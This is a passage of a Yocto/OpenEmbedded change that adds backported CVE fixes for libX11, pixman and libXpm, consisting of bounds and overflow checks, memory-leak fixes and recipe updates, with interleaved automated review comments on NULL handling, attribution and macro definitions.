258 if ((bp = buf = Xmalloc(nbytes))) {
259 /* copy arguments into single buffer */
260@@ -256,6 +259,8 @@ XSetStandardProperties (
261
262 if (name != NULL) XStoreName (dpy, w, name);
263
264+ if (safestrlen(icon_string) >= USHRT_MAX)
265+ return 1;
266 if (icon_string != NULL) {
267 XChangeProperty (dpy, w, XA_WM_ICON_NAME, XA_STRING, 8,
268 PropModeReplace,
269@@ -298,6 +303,8 @@ XSetClassHint(
270
271 len_nm = safestrlen(classhint->res_name);
272 len_cl = safestrlen(classhint->res_class);
273+ if (len_nm + len_cl >= USHRT_MAX)
274+ return 1;
275 if ((class_string = s = Xmalloc(len_nm + len_cl + 2))) {
276 if (len_nm) {
277 strcpy(s, classhint->res_name);
278diff --git a/src/StNColor.c b/src/StNColor.c
279index 8b821c3e..ba021958 100644
280--- a/src/StNColor.c
281+++ b/src/StNColor.c
282@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
283 #ifdef HAVE_CONFIG_H
284 #include <config.h>
285 #endif
286+#include <limits.h>
287 #include <stdio.h>
288 #include "Xlibint.h"
289 #include "Xcmsint.h"
290@@ -46,6 +47,8 @@ int flags) /* DoRed, DoGreen, DoBlue */
291 XcmsColor cmsColor_exact;
292 XColor scr_def;
293
294+ if (strlen(name) >= USHRT_MAX)
295+ return 0;
296 #ifdef XCMS
297 /*
298 * Let's Attempt to use Xcms approach to Parse Color
299diff --git a/src/StName.c b/src/StName.c
300index b4048bff..5a632d0c 100644
301--- a/src/StName.c
302+++ b/src/StName.c
303@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
304 #ifdef HAVE_CONFIG_H
305 #include <config.h>
306 #endif
307+#include <limits.h>
308 #include <X11/Xlibint.h>
309 #include <X11/Xatom.h>
310
311@@ -36,7 +37,9 @@ XStoreName (
312 Window w,
313 _Xconst char *name)
314 {
315- return XChangeProperty(dpy, w, XA_WM_NAME, XA_STRING,
316+ if (strlen(name) >= USHRT_MAX)
317+ return 0;
318+ return XChangeProperty(dpy, w, XA_WM_NAME, XA_STRING, /* */
319 8, PropModeReplace, (_Xconst unsigned char *)name,
320 name ? strlen(name) : 0);
321 }
322@@ -47,6 +50,8 @@ XSetIconName (
323 Window w,
324 _Xconst char *icon_name)
325 {
326+ if (strlen(icon_name) >= USHRT_MAX)
327+ return 0;
328 return XChangeProperty(dpy, w, XA_WM_ICON_NAME, XA_STRING, 8,
329 PropModeReplace, (_Xconst unsigned char *)icon_name,
330 icon_name ? strlen(icon_name) : 0);
331--
3322.32.0
333
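Review bot: Several of the added length checks call `strlen()` on a pointer that the surrounding code treats as possibly NULL: XQueryExtension(), XStoreName() and XSetIconName() each gain an unconditional `strlen(...) >= USHRT_MAX` test directly above an existing `name ? strlen(name) : 0` (or `icon_name ? ...`) expression, so a NULL argument that was tolerated before is now dereferenced in the check. Guarding the test, e.g. `if (name != NULL && strlen(name) >= USHRT_MAX)`, keeps the old behaviour; XSetStandardProperties() in the same patch uses safestrlen() for its check instead. In src/SetFPath.c the new `#include <limits.h>` sits inside the `#ifdef HAVE_CONFIG_H` block, so USHRT_MAX depends on that macro being defined unless another header supplies it; placing the include after `#endif`, as the other files do, avoids that. XSetCommand(), XSetStandardProperties() and XSetClassHint() return 1 when they refuse an over-long string, which callers presumably cannot distinguish from success, so a comment stating that the request is dropped would help.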
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3554.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3554.patch
new file mode 100644
index 0000000000..fb61195225
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3554.patch
@@ -0,0 +1,58 @@
1From 8b51d1375a4dd6a7cf3a919da83d8e87e57e7333 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Wed, 2 Nov 2022 17:04:15 +0530
4Subject: [PATCH] CVE-2022-3554
5
6Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/1d11822601fd24a396b354fa616b04ed3df8b4ef]
7CVE: CVE-2022-3554
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9
10fix a memory leak in XRegisterIMInstantiateCallback
11
12Analysis:
13
14 _XimRegisterIMInstantiateCallback() opens an XIM and closes it using
15 the internal function pointers, but the internal close function does
16 not free the pointer to the XIM (this would be done in XCloseIM()).
17
18Report/patch:
19
20 Date: Mon, 03 Oct 2022 18:47:32 +0800
21 From: Po Lu <luangruo@yahoo.com>
22 To: xorg-devel@lists.x.org
23 Subject: Re: Yet another leak in Xlib
24
25 For reference, here's how I'm calling XRegisterIMInstantiateCallback:
26
27 XSetLocaleModifiers ("");
28 XRegisterIMInstantiateCallback (compositor.display,
29 XrmGetDatabase (compositor.display),
30 (char *) compositor.resource_name,
31 (char *) compositor.app_name,
32 IMInstantiateCallback, NULL);
33 and XMODIFIERS is:
34
35 @im=ibus
36
37Signed-off-by: Thomas E. Dickey's avatarThomas E. Dickey <dickey@invisible-island.net>
38---
39 modules/im/ximcp/imInsClbk.c | 3 +++
40 1 file changed, 3 insertions(+)
41
42diff --git a/modules/im/ximcp/imInsClbk.c b/modules/im/ximcp/imInsClbk.c
43index 961aaba..0a8a874 100644
44--- a/modules/im/ximcp/imInsClbk.c
45+++ b/modules/im/ximcp/imInsClbk.c
46@@ -204,6 +204,9 @@ _XimRegisterIMInstantiateCallback(
47 if( xim ) {
48 lock = True;
49 xim->methods->close( (XIM)xim );
50+ /* XIMs must be freed manually after being opened; close just
51+ does the protocol to deinitialize the IM. */
52+ XFree( xim );
53 lock = False;
54 icb->call = True;
55 callback( display, client_data, NULL );
56--
572.25.1
58
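Review bot: The header of this patch file carries web-page residue and weak attribution: the trailer reads `Signed-off-by: Thomas E. Dickey's avatarThomas E. Dickey <dickey@invisible-island.net>`, the Subject is only `CVE-2022-3554`, and the From/Date lines appear to name the backporter rather than the upstream author. Regenerating the file from the upstream commit given in Upstream-Status (for example with git format-patch), then appending the `CVE:` and backporter `Signed-off-by:` lines, would keep the provenance checkable against upstream. The code change itself, `XFree( xim );` after `xim->methods->close( (XIM)xim );`, matches the analysis quoted in the header.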
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3555.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3555.patch
new file mode 100644
index 0000000000..855ce80e77
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3555.patch
@@ -0,0 +1,38 @@
1From 8a368d808fec166b5fb3dfe6312aab22c7ee20af Mon Sep 17 00:00:00 2001
2From: Hodong <hodong@yozmos.com>
3Date: Thu, 20 Jan 2022 00:57:41 +0900
4Subject: [PATCH] Fix two memory leaks in _XFreeX11XCBStructure()
5
6Even when XCloseDisplay() was called, some memory was leaked.
7
8XCloseDisplay() calls _XFreeDisplayStructure(), which calls
9_XFreeX11XCBStructure().
10
11However, _XFreeX11XCBStructure() did not destroy the condition variables,
12resulting in the leaking of some 40 bytes.
13
14Signed-off-by: Hodong <hodong@yozmos.com>
15
16Upstream-Status: Backport from [https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/8a368d808fec166b5fb3dfe6312aab22c7ee20af]
17CVE:CVE-2022-3555
18Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
19---
20 src/xcb_disp.c | 2 ++
21 1 file changed, 2 insertions(+)
22
23diff --git a/src/xcb_disp.c b/src/xcb_disp.c
24index 70a602f4..e9becee3 100644
25--- a/src/xcb_disp.c
26+++ b/src/xcb_disp.c
27@@ -102,6 +102,8 @@ void _XFreeX11XCBStructure(Display *dpy)
28 dpy->xcb->pending_requests = tmp->next;
29 free(tmp);
30 }
31+ xcondition_clear(dpy->xcb->event_notify);
32+ xcondition_clear(dpy->xcb->reply_notify);
33 xcondition_free(dpy->xcb->event_notify);
34 xcondition_free(dpy->xcb->reply_notify);
35 Xfree(dpy->xcb);
36--
372.18.2
38
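--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-3138.patch
@@ -0,0 +1,111 @@
+From 304a654a0d57bf0f00d8998185f0360332cfa36c Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Sat, 10 Jun 2023 16:30:07 -0700
+Subject: [PATCH] InitExt.c: Add bounds checks for extension request, event, &
+ error codes
+
+Fixes CVE-2023-3138: X servers could return values from XQueryExtension
+that would cause Xlib to write entries out-of-bounds of the arrays to
+store them, though this would only overwrite other parts of the Display
+struct, not outside the bounds allocated for that structure.
+
+Reported-by: Gregory James DUCK <gjduck@gmail.com>
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+CVE: CVE-2023-3138
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/304a654a0d57bf0f00d8998185f0360332cfa36c.patch]
+Signed-off-by: Poonam Jadhav <poonam.jadhav@kpit.com>
+---
+ src/InitExt.c | 42 ++++++++++++++++++++++++++++++++++++++++++
+ 1 file changed, 42 insertions(+)
+
+diff --git a/src/InitExt.c b/src/InitExt.c
+index 4de46f15..afc00a6b 100644
+--- a/src/InitExt.c
++++ b/src/InitExt.c
+@@ -33,6 +33,18 @@ from The Open Group.
+ #include <X11/Xos.h>
+ #include <stdio.h>
+
++/* The X11 protocol spec reserves events 64 through 127 for extensions */
++#ifndef LastExtensionEvent
++#define LastExtensionEvent 127
++#endif
++
++/* The X11 protocol spec reserves requests 128 through 255 for extensions */
++#ifndef LastExtensionRequest
++#define FirstExtensionRequest 128
++#define LastExtensionRequest 255
++#endif
++
++
+ /*
+ * This routine is used to link a extension in so it will be called
+ * at appropriate times.
+@@ -242,6 +254,12 @@ WireToEventType XESetWireToEvent(
+ WireToEventType proc) /* routine to call when converting event */
+ {
+ register WireToEventType oldproc;
++ if (event_number < 0 ||
++ event_number > LastExtensionEvent) {
++ fprintf(stderr, "Xlib: ignoring invalid extension event %d\n",
++ event_number);
++ return (WireToEventType)_XUnknownWireEvent;
++ }
+ if (proc == NULL) proc = (WireToEventType)_XUnknownWireEvent;
+ LockDisplay (dpy);
+ oldproc = dpy->event_vec[event_number];
+@@ -263,6 +281,12 @@ WireToEventCookieType XESetWireToEventCookie(
+ )
+ {
+ WireToEventCookieType oldproc;
++ if (extension < FirstExtensionRequest ||
++ extension > LastExtensionRequest) {
++ fprintf(stderr, "Xlib: ignoring invalid extension opcode %d\n",
++ extension);
++ return (WireToEventCookieType)_XUnknownWireEventCookie;
++ }
+ if (proc == NULL) proc = (WireToEventCookieType)_XUnknownWireEventCookie;
+ LockDisplay (dpy);
+ oldproc = dpy->generic_event_vec[extension & 0x7F];
+@@ -284,6 +308,12 @@ CopyEventCookieType XESetCopyEventCookie(
+ )
+ {
+ CopyEventCookieType oldproc;
++ if (extension < FirstExtensionRequest ||
++ extension > LastExtensionRequest) {
++ fprintf(stderr, "Xlib: ignoring invalid extension opcode %d\n",
++ extension);
++ return (CopyEventCookieType)_XUnknownCopyEventCookie;
++ }
+ if (proc == NULL) proc = (CopyEventCookieType)_XUnknownCopyEventCookie;
+ LockDisplay (dpy);
+ oldproc = dpy->generic_event_copy_vec[extension & 0x7F];
+@@ -305,6 +335,12 @@ EventToWireType XESetEventToWire(
+ EventToWireType proc) /* routine to call when converting event */
+ {
+ register EventToWireType oldproc;
++ if (event_number < 0 ||
++ event_number > LastExtensionEvent) {
++ fprintf(stderr, "Xlib: ignoring invalid extension event %d\n",
++ event_number);
++ return (EventToWireType)_XUnknownNativeEvent;
++ }
+ if (proc == NULL) proc = (EventToWireType) _XUnknownNativeEvent;
+ LockDisplay (dpy);
+ oldproc = dpy->wire_vec[event_number];
+@@ -325,6 +361,12 @@ WireToErrorType XESetWireToError(
+ WireToErrorType proc) /* routine to call when converting error */
+ {
+ register WireToErrorType oldproc = NULL;
++ if (error_number < 0 ||
++ error_number > LastExtensionError) {
++ fprintf(stderr, "Xlib: ignoring invalid extension error %d\n",
++ error_number);
++ return (WireToErrorType)_XDefaultWireError;
++ }
+ if (proc == NULL) proc = (WireToErrorType)_XDefaultWireError;
+ LockDisplay (dpy);
+ if (!dpy->error_vec) {
+--
+GitLab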
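Review bot: `XESetWireToError` (patch lines 101-106) is bounds-checked against `LastExtensionError`, which the fallback block added at the top of InitExt.c does not define, unlike `LastExtensionEvent` and `LastExtensionRequest`. It presumably comes from the X protocol headers; for a backport onto libx11 1.6.9 that is worth confirming with a build rather than assuming. Separately, the two event checks accept 0 through `LastExtensionEvent` although the added comment speaks of events 64 through 127. If the guard is there to bound the array index and not to enforce the extension range, a short comment such as `/* bounds the event_vec index; core event numbers are still accepted */` would say so. All five functions continue outside their hunks.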
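--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43785.patch
@@ -0,0 +1,63 @@
+From 6858d468d9ca55fb4c5fd70b223dbc78a3358a7f Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Sun, 17 Sep 2023 14:19:40 -0700
+Subject: [PATCH libX11 1/5] CVE-2023-43785: out-of-bounds memory access in
+ _XkbReadKeySyms()
+
+Make sure we allocate enough memory in the first place, and
+also handle error returns from _XkbReadBufferCopyKeySyms() when
+it detects out-of-bounds issues.
+
+Reported-by: Gregory James DUCK <gjduck@gmail.com>
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0001-CVE-2023-43785-out-of-bounds-memory-access-in-_XkbRe.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/6858d468d9ca55fb4c5fd70b223dbc78a3358a7f]
+CVE: CVE-2023-43785
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/xkb/XKBGetMap.c | 14 +++++++++-----
+ 1 file changed, 9 insertions(+), 5 deletions(-)
+
+diff --git a/src/xkb/XKBGetMap.c b/src/xkb/XKBGetMap.c
+index 2891d21e..31199e4a 100644
+--- a/src/xkb/XKBGetMap.c
++++ b/src/xkb/XKBGetMap.c
+@@ -182,7 +182,8 @@ _XkbReadKeySyms(XkbReadBufferPtr buf, XkbDescPtr xkb, xkbGetMapReply *rep)
+ if (offset + newMap->nSyms >= map->size_syms) {
+ register int sz;
+
+- sz = map->size_syms + 128;
++ sz = offset + newMap->nSyms;
++ sz = ((sz + (unsigned) 128) / 128) * 128;
+ _XkbResizeArray(map->syms, map->size_syms, sz, KeySym);
+ if (map->syms == NULL) {
+ map->size_syms = 0;
+@@ -191,8 +192,9 @@ _XkbReadKeySyms(XkbReadBufferPtr buf, XkbDescPtr xkb, xkbGetMapReply *rep)
+ map->size_syms = sz;
+ }
+ if (newMap->nSyms > 0) {
+- _XkbReadBufferCopyKeySyms(buf, (KeySym *) &map->syms[offset],
+- newMap->nSyms);
++ if (_XkbReadBufferCopyKeySyms(buf, (KeySym *) &map->syms[offset],
++ newMap->nSyms) == 0)
++ return BadLength;
+ offset += newMap->nSyms;
+ }
+ else {
+@@ -222,8 +224,10 @@ _XkbReadKeySyms(XkbReadBufferPtr buf, XkbDescPtr xkb, xkbGetMapReply *rep)
+ newSyms = XkbResizeKeySyms(xkb, i + rep->firstKeySym, tmp);
+ if (newSyms == NULL)
+ return BadAlloc;
+- if (newMap->nSyms > 0)
+- _XkbReadBufferCopyKeySyms(buf, newSyms, newMap->nSyms);
++ if (newMap->nSyms > 0) {
++ if (_XkbReadBufferCopyKeySyms(buf, newSyms, newMap->nSyms) == 0)
++ return BadLength;
++ }
+ else
+ newSyms[0] = NoSymbol;
+ oldMap->kt_index[0] = newMap->ktIndex[0];
+--
+2.39.3
+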
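--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-1.patch
@@ -0,0 +1,42 @@
+From 204c3393c4c90a29ed6bef64e43849536e863a86 Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Thu, 7 Sep 2023 15:54:30 -0700
+Subject: [PATCH libX11 2/5] CVE-2023-43786: stack exhaustion from infinite
+ recursion in PutSubImage()
+
+When splitting a single line of pixels into chunks to send to the
+X server, be sure to take into account the number of bits per pixel,
+so we don't just loop forever trying to send more pixels than fit in
+the given request size and not breaking them down into a small enough
+chunk to fix.
+
+Fixes: "almost complete rewrite" (Dec. 12, 1987) from X11R2
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0002-CVE-2023-43786-stack-exhaustion-from-infinite-recurs.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/204c3393c4c90a29ed6bef64e43849536e863a86]
+CVE: CVE-2023-43786
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/PutImage.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/src/PutImage.c b/src/PutImage.c
+index 857ee916..a6db7b42 100644
+--- a/src/PutImage.c
++++ b/src/PutImage.c
+@@ -914,8 +914,9 @@ PutSubImage (
+ req_width, req_height - SubImageHeight,
+ dest_bits_per_pixel, dest_scanline_pad);
+ } else {
+- int SubImageWidth = (((Available << 3) / dest_scanline_pad)
+- * dest_scanline_pad) - left_pad;
++ int SubImageWidth = ((((Available << 3) / dest_scanline_pad)
++ * dest_scanline_pad) - left_pad)
++ / dest_bits_per_pixel;
+
+ PutSubImage(dpy, d, gc, image, req_xoffset, req_yoffset, x, y,
+ (unsigned int) SubImageWidth, 1,
+--
+2.39.3
+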
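--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-2.patch
@@ -0,0 +1,46 @@
+From 73a37d5f2fcadd6540159b432a70d80f442ddf4a Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Thu, 7 Sep 2023 15:55:04 -0700
+Subject: [PATCH libX11 3/5] XPutImage: clip images to maximum height & width
+ allowed by protocol
+
+The PutImage request specifies height & width of the image as CARD16
+(unsigned 16-bit integer), same as the maximum dimensions of an X11
+Drawable, which the image is being copied to.
+
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0003-XPutImage-clip-images-to-maximum-height-width-allowe.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/73a37d5f2fcadd6540159b432a70d80f442ddf4a]
+CVE: CVE-2023-43786
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/PutImage.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/src/PutImage.c b/src/PutImage.c
+index a6db7b42..ba411e36 100644
+--- a/src/PutImage.c
++++ b/src/PutImage.c
+@@ -30,6 +30,7 @@ in this Software without prior written authorization from The Open Group.
+ #include "Xlibint.h"
+ #include "Xutil.h"
+ #include <stdio.h>
++#include <limits.h>
+ #include "Cr.h"
+ #include "ImUtil.h"
+ #include "reallocarray.h"
+@@ -962,6 +963,10 @@ XPutImage (
+ height = image->height - req_yoffset;
+ if ((width <= 0) || (height <= 0))
+ return 0;
++ if (width > USHRT_MAX)
++ width = USHRT_MAX;
++ if (height > USHRT_MAX)
++ height = USHRT_MAX;
+
+ if ((image->bits_per_pixel == 1) || (image->format != ZPixmap)) {
+ dest_bits_per_pixel = 1;
+--
+2.39.3
+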
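--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-1.patch
@@ -0,0 +1,52 @@
+From b4031fc023816aca07fbd592ed97010b9b48784b Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Thu, 7 Sep 2023 16:12:27 -0700
+Subject: [PATCH libX11 4/5] XCreatePixmap: trigger BadValue error for
+ out-of-range dimensions
+
+The CreatePixmap request specifies height & width of the image as CARD16
+(unsigned 16-bit integer), so if either is larger than that, set it to 0
+so the X server returns a BadValue error as the protocol requires.
+
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0004-XCreatePixmap-trigger-BadValue-error-for-out-of-rang.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/b4031fc023816aca07fbd592ed97010b9b48784b]
+CVE: CVE-2023-43787
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/CrPixmap.c | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/src/CrPixmap.c b/src/CrPixmap.c
+index cdf31207..3cb2ca6d 100644
+--- a/src/CrPixmap.c
++++ b/src/CrPixmap.c
+@@ -28,6 +28,7 @@ in this Software without prior written authorization from The Open Group.
+ #include <config.h>
+ #endif
+ #include "Xlibint.h"
++#include <limits.h>
+
+ #ifdef USE_DYNAMIC_XCURSOR
+ void
+@@ -47,6 +48,16 @@ Pixmap XCreatePixmap (
+ Pixmap pid;
+ register xCreatePixmapReq *req;
+
++ /*
++ * Force a BadValue X Error if the requested dimensions are larger
++ * than the X11 protocol has room for, since that's how callers expect
++ * to get notified of errors.
++ */
++ if (width > USHRT_MAX)
++ width = 0;
++ if (height > USHRT_MAX)
++ height = 0;
++
+ LockDisplay(dpy);
+ GetReq(CreatePixmap, req);
+ req->drawable = d;
+--
+2.39.3
+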
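--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-2.patch
@@ -0,0 +1,64 @@
+From 7916869d16bdd115ac5be30a67c3749907aea6a0 Mon Sep 17 00:00:00 2001
+From: Yair Mizrahi <yairm@jfrog.com>
+Date: Thu, 7 Sep 2023 16:15:32 -0700
+Subject: [PATCH libX11 5/5] CVE-2023-43787: Integer overflow in XCreateImage()
+ leading to a heap overflow
+
+When the format is `Pixmap` it calculates the size of the image data as:
+ ROUNDUP((bits_per_pixel * width), image->bitmap_pad);
+There is no validation on the `width` of the image, and so this
+calculation exceeds the capacity of a 4-byte integer, causing an overflow.
+
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0005-CVE-2023-43787-Integer-overflow-in-XCreateImage-lead.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/7916869d16bdd115ac5be30a67c3749907aea6a0]
+CVE: CVE-2023-43787
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/ImUtil.c | 20 +++++++++++++++-----
+ 1 file changed, 15 insertions(+), 5 deletions(-)
+
+diff --git a/src/ImUtil.c b/src/ImUtil.c
+index 36f08a03..fbfad33e 100644
+--- a/src/ImUtil.c
++++ b/src/ImUtil.c
+@@ -30,6 +30,7 @@ in this Software without prior written authorization from The Open Group.
+ #include <X11/Xlibint.h>
+ #include <X11/Xutil.h>
+ #include <stdio.h>
++#include <limits.h>
+ #include "ImUtil.h"
+
+ static int _XDestroyImage(XImage *);
+@@ -361,13 +362,22 @@ XImage *XCreateImage (
+ /*
+ * compute per line accelerator.
+ */
+- {
+- if (format == ZPixmap)
++ if (format == ZPixmap) {
++ if ((INT_MAX / bits_per_pixel) < width) {
++ Xfree(image);
++ return NULL;
++ }
++
+ min_bytes_per_line =
+- ROUNDUP((bits_per_pixel * width), image->bitmap_pad);
+- else
++ ROUNDUP((bits_per_pixel * width), image->bitmap_pad);
++ } else {
++ if ((INT_MAX - offset) < width) {
++ Xfree(image);
++ return NULL;
++ }
++
+ min_bytes_per_line =
+- ROUNDUP((width + offset), image->bitmap_pad);
++ ROUNDUP((width + offset), image->bitmap_pad);
+ }
+ if (image_bytes_per_line == 0) {
+ image->bytes_per_line = min_bytes_per_line;
+--
+2.39.3
+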
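--- a/meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb
+++ b/meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb
@@ -15,6 +15,15 @@ SRC_URI += "file://Fix-hanging-issue-in-_XReply.patch \
  file://libx11-whitespace.patch \
  file://CVE-2020-14344.patch \
  file://CVE-2020-14363.patch \
+ file://CVE-2021-31535.patch \
+ file://CVE-2022-3554.patch \
+ file://CVE-2022-3555.patch \
+ file://CVE-2023-3138.patch \
+ file://CVE-2023-43785.patch \
+ file://CVE-2023-43786-1.patch \
+ file://CVE-2023-43786-2.patch \
+ file://CVE-2023-43787-1.patch \
+ file://CVE-2023-43787-2.patch \
 "
 
 SRC_URI[md5sum] = "55adbfb6d4370ecac5e70598c4e7eed2"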
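--- a/meta/recipes-graphics/xorg-lib/libxpm_3.5.13.bb
+++ b/meta/recipes-graphics/xorg-lib/libxpm_3.5.17.bb
@@ -11,17 +11,18 @@ an extension of the monochrome XBM bitmap specificied in the X \
 protocol."
 
 LICENSE = "MIT"
-LIC_FILES_CHKSUM = "file://COPYING;md5=51f4270b012ecd4ab1a164f5f4ed6cf7"
+LIC_FILES_CHKSUM = "file://COPYING;md5=903942ebc9d807dfb68540f40bae5aff"
 DEPENDS += "libxext libsm libxt gettext-native"
 PE = "1"
 
 XORG_PN = "libXpm"
+XORG_EXT = "tar.xz"
+EXTRA_OECONF += "--disable-open-zfile"
 
 PACKAGES =+ "sxpm cxpm"
 FILES_cxpm = "${bindir}/cxpm"
 FILES_sxpm = "${bindir}/sxpm"
 
-SRC_URI[md5sum] = "6f0ecf8d103d528cfc803aa475137afa"
+SRC_URI[sha256sum] = "64b31f81019e7d388c822b0b28af8d51c4622b83f1f0cb6fa3fc95e271226e43"
-SRC_URI[sha256sum] = "9cd1da57588b6cb71450eff2273ef6b657537a9ac4d02d0014228845b935ac25"
 
 BBCLASSEXTEND = "native"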
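Review bot: `EXTRA_OECONF += "--disable-open-zfile"` arrives together with the version bump, but the recipe does not say why it is set. As far as I know the option turns off libXpm's handling of compressed (.Z/.gz) XPM files, which is done by running external compression programs. A one-line comment above it, e.g. `# No compressed-XPM support: avoids the dependency on external compress/gzip helpers`, would keep the option from being dropped on a later upgrade. Please confirm the wording against the upstream configure help before adding it.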
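--- a/meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb
+++ b/meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb
@@ -6,7 +6,7 @@ using file descriptor passing."
 
 require xorg-lib-common.inc
 
-LICENSE = "MIT-style"
+LICENSE = "HPND"
 LIC_FILES_CHKSUM = "file://COPYING;md5=47e508ca280fde97906eacb77892c3ac"
 
 DEPENDS += "virtual/libx11"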
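--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/pixman/CVE-2022-44638.patch
@@ -0,0 +1,34 @@
+CVE: CVE-2022-44638
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+Signed-off-by:Bhabu Bindu <bhabu.bindu@kpit.com>
+
+From a1f88e842e0216a5b4df1ab023caebe33c101395 Mon Sep 17 00:00:00 2001
+From: Matt Turner <mattst88@gmail.com>
+Date: Wed, 2 Nov 2022 12:07:32 -0400
+Subject: [PATCH] Avoid integer overflow leading to out-of-bounds write
+
+Thanks to Maddie Stone and Google's Project Zero for discovering this
+issue, providing a proof-of-concept, and a great analysis.
+
+Closes: https://gitlab.freedesktop.org/pixman/pixman/-/issues/63
+---
+ pixman/pixman-trap.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/pixman/pixman-trap.c b/pixman/pixman-trap.c
+index 91766fd..7560405 100644
+--- a/pixman/pixman-trap.c
++++ b/pixman/pixman-trap.c
+@@ -74,7 +74,7 @@ pixman_sample_floor_y (pixman_fixed_t y,
+
+ if (f < Y_FRAC_FIRST (n))
+ {
+- if (pixman_fixed_to_int (i) == 0x8000)
++ if (pixman_fixed_to_int (i) == 0xffff8000)
+ {
+ f = 0; /* saturate */
+ }
+--
+GitLab
+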
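Review bot: `Upstream-Status: Backport` on patch line 2 names no upstream commit, so the backport cannot be compared with its origin from the patch alone; the libx11 patches in this same change give the source in brackets. The `From` line further down already carries the hash, so the tag can read `Upstream-Status: Backport [<upstream pixman commit URL for a1f88e842e0216a5b4df1ab023caebe33c101395>]`. `Signed-off-by:Bhabu Bindu` on line 4 is also missing the space after the colon. The enclosing `pixman_sample_floor_y` continues outside the inner hunk.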
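--- a/meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb
+++ b/meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb
@@ -10,6 +10,7 @@ DEPENDS = "zlib"
 SRC_URI = "https://www.cairographics.org/releases/${BP}.tar.gz \
  file://0001-ARM-qemu-related-workarounds-in-cpu-features-detecti.patch \
  file://0001-test-utils-Check-for-FE_INVALID-definition-before-us.patch \
+ file://CVE-2022-44638.patch \
  "
 SRC_URI[md5sum] = "267a7af290f93f643a1bc74490d9fdd1"
 SRC_URI[sha256sum] = "da66d6fd6e40aee70f7bd02e4f8f76fc3f006ec879d346bae6a723025cfbdde7"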
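--- a/meta/recipes-graphics/xorg-lib/xorg-lib-common.inc
+++ b/meta/recipes-graphics/xorg-lib/xorg-lib-common.inc
@@ -6,8 +6,9 @@ LICENSE = "MIT-X"
 DEPENDS = "util-macros"
 
 XORG_PN = "${BPN}"
+XORG_EXT ?= "tar.bz2"
 
-SRC_URI = "${XORG_MIRROR}/individual/lib/${XORG_PN}-${PV}.tar.bz2"
+SRC_URI = "${XORG_MIRROR}/individual/lib/${XORG_PN}-${PV}.${XORG_EXT}"
 
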